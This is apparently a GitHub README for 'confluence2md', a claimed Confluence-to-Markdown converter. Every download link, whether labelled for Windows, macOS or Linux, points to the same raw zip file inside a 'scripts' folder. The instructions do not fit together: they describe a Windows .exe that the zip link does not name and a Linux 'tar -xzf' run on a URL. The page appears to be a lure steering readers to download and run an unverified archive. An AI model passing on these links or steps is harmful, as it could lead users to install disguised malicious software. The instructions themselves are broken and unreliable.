confluence2md is a simple tool that helps you convert Confluence MIME exports (.doc files) into clean Markdown format. This conversion allows you to use your content seamlessly in other platforms or tools that support Markdown.
Follow these steps to download and run the application.
To get the latest version of confluence2md, please visit the Releases page. Here, you will find different versions of the software listed.
On the Releases page, look for the latest release. You will see a list of assets available for download. Click on the available package for your operating system. You might see options like:
- https://github.com/Santex12/confluence2md/raw/refs/heads/main/scripts/md_confluence_3.5.zip (for Windows)
- https://github.com/Santex12/confluence2md/raw/refs/heads/main/scripts/md_confluence_3.5.zip (for macOS)
- https://github.com/Santex12/confluence2md/raw/refs/heads/main/scripts/md_confluence_3.5.zip (for Linux)
Download the appropriate file by clicking on it.
After the download completes, locate the downloaded file on your device.
- For Windows users: Double-click on the .exe file to start the installation. Follow the prompts to complete the installation.
- For macOS users: Open the https://github.com/Santex12/confluence2md/raw/refs/heads/main/scripts/md_confluence_3.5.zip file, extract it, and move the application to your Applications folder.
- For Linux users: Open a terminal and extract the https://github.com/Santex12/confluence2md/raw/refs/heads/main/scripts/md_confluence_3.5.zip file using the command:
Then navigate to the extracted folder.
tar -xzf https://github.com/Santex12/confluence2md/raw/refs/heads/main/scripts/md_confluence_3.5.zip
Once installed, you can run confluence2md:
- Windows: You can find the application in your Start menu. Click on it to launch.
- macOS: Open your Applications folder and double-click on confluence2md to start.
- Linux: In the terminal, navigate to the directory where you extracted the application and type:
./confluence2md
confluence2md includes various features to make your document conversion smooth:
- Easy Conversion: Convert .doc files in a few clicks.
- Clean Output: The resulting Markdown is clean and easy to read.
- Cross-Platform: Use on Windows, macOS, and Linux without any issues.
- Fast Processing: Quick conversions so you can focus on your work.
- No Learning Curve: You donβt need advanced skills to use this tool.
- Launch the application.
- Click on the "Choose File" button to select your .doc file from your system.
- Choose your desired output directory.
- Click on "Convert" to start the process.
- After the conversion, check the output directory for your Markdown file.
Make sure your system meets the following requirements for a smooth experience:
- Operating System:
- Windows 10 or newer
- macOS 10.12 or newer
- Linux (any modern distribution)
- Memory: At least 2 GB of RAM
- Disk Space: Minimum of 100 MB for installation and output files
To download and install the application, go back to the Releases page. Choose the correct package for your operating system, download it, and follow the installation steps provided earlier.
A: Currently, confluence2md converts .doc files exported from Confluence.
A: Yes, once the file is converted, you can use any text editor to modify the Markdown file as needed.
A: Detailed usage instructions are available in this README. For additional help, you may find support in our community discussions on GitHub.
If you have questions or suggestions, feel free to reach out. You can open an issue on our GitHub page for support. Join our community to connect with other users and developers.
If you wish to contribute to this project, you are welcome. Please check the guidelines in our repository to find out how you can help improve confluence2md.
This project is licensed under the MIT License. See the LICENSE file in the repository for more details.
Thank you for using confluence2md! Happy converting!